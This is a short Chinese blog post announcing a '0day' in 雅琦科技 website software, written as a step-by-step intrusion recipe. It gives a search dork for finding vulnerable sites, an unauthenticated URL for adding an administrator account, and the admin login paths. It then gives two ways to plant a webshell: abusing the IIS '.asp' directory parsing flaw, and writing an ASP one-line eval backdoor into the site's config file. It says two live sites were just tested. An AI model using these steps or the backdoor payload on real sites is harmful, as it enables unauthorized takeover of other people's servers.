雅琦科技程序0day

时间: 2010-06-18 / 分类: 电脑技巧 / 浏览次数: 825 次 / 1 个评论 发表评论

在网上发现又出现一个新的漏洞 雅琦科技程序0day

关键字:inurl:ShowInfo.asp?ShowId=

找到网站后然后在网站地址后加上:admin/User_Manage.asp?action=UserAdd

进去添加一个管理员,然后用添加的账户登录。
/admin/Yqlogin.asp
/admin/admin_main.asp
(一般是这个)

后台拿Webshell网上有2个方法,不过我对这个不大在行。呵呵。。。还不会,方法如下:

1.在上传目录那里 添加1.asp,利用IIS的解析漏洞。

2.在上传目录那里 写上
“%><%eval request(“a”)%><%’
然后访问配置文件 inc/config.asp

下面是刚检测的俩站

雅琦科技程序0day

雅琦科技程序0day

填写您的邮件地址,订阅我们的精彩内容:

1个评论

  1. Oakley Sunglasses
    2011/07/19 22:23:27

    学习了

发表评论

您的昵称 (必填哦)

您的邮箱 (必填哦)

您的网站

4+8= (麻烦算一下吧(*^__^*) )